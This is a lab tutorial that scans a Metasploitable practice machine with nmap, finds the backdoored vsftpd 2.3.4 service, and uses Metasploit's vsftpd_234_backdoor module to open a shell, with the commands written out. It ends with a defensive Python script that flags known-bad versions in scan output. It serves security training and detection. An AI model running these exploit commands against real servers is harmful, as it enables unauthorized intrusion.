To practice gaining access to a web server, we need the following:
- Metasploitable server: the target machine.
- Kali Linux: the attack machine.
How to Gain Access to a Server?
To hack a server, we first have to find out whether there is a vulnerability in that machine. You can think of vulnerabilities as open doors into a system. Hackers leverage these open doors to gain access to a system.
After finding a vulnerability, we perform the attack.
Steps to Gain Access
1. In this case, we are going to be attacking the Metasploitable server, so make sure you start it up and check its IP address. In my case, its IP address is 192.168.43.13.
2. To find vulnerabilities, open the terminal and run the following command:
mrdev@kali:~$ nmap -sV 192.168.43.13
The scan takes some time; when it finishes, it lists the open ports and the service version detected on each.
In the scan results we found a vulnerable service: vsftpd 2.3.4.
3. Now start the Metasploit framework.
mrdev@kali:~$ msfconsole
msf6 > search vsftpd
This module exploits a malicious backdoor that was added to the vsftpd download archive. This backdoor was introduced in the vsftpd-2.3.4.tar.gz archive between June 30th, 2011 and July 1st, 2011 according to the most recent information available. This backdoor was removed on July 3rd, 2011.
4. To gain access, use the following commands:
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(exploit/unix/ftp/vsftpd_234_backdoor) > show options
msf6 exploit(exploit/unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.43.13
RHOSTS => 192.168.43.13
msf6 exploit(exploit/unix/ftp/vsftpd_234_backdoor) > exploit
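
From the defender's side, the `nmap -sV` output from step 2 can be checked automatically against a list of releases known to be compromised, so a host running vsftpd 2.3.4 is flagged before anyone else finds it. The following is an added example, not part of the original walkthrough; the scan text is constructed sample data and the function names are hypothetical.

```python
import re

# Releases to flag. vsftpd 2.3.4 comes from the walkthrough above; extend as needed.
KNOWN_BAD = {("vsftpd", "2.3.4")}

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([^\s()]+)\)?$")
# Matches port table rows such as: "21/tcp   open   ftp     vsftpd 2.3.4"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

# Constructed sample of normal `nmap -sV` output for two lab hosts.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.43.13
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     vsftpd 2.3.4
22/tcp   open   ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   closed telnet

Nmap scan report for files.lab.test (192.168.43.14)
PORT     STATE  SERVICE VERSION
21/tcp   open   ftp     vsftpd 3.0.3
"""

def parse_nmap_sv(text):
    """Yield (host, port, proto, service, banner) for every open port."""
    host = None
    for line in text.splitlines():
        line = line.strip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if m and m.group(3) == "open":
            yield host, int(m.group(1)), m.group(2), m.group(4), (m.group(5) or "")

def find_known_bad(text, known_bad=KNOWN_BAD):
    """Return (host, port, proto, product, version) for each flagged service."""
    findings = []
    for host, port, proto, _service, banner in parse_nmap_sv(text):
        for product, version in known_bad:
            # Exact version token only: 2.3.4 must not match 2.3.40 or 12.3.4.
            pat = rf"(?<![\w.]){re.escape(product)}\s+{re.escape(version)}(?![\w.])"
            if re.search(pat, banner, re.I):
                findings.append((host, port, proto, product, version))
    return findings

if __name__ == "__main__":
    for host, port, proto, product, version in find_known_bad(SAMPLE_SCAN):
        print(f"{host}:{port}/{proto} runs {product} {version} (known-bad release)")
```

A hit means the service should be taken offline and replaced with a current package from a trusted source.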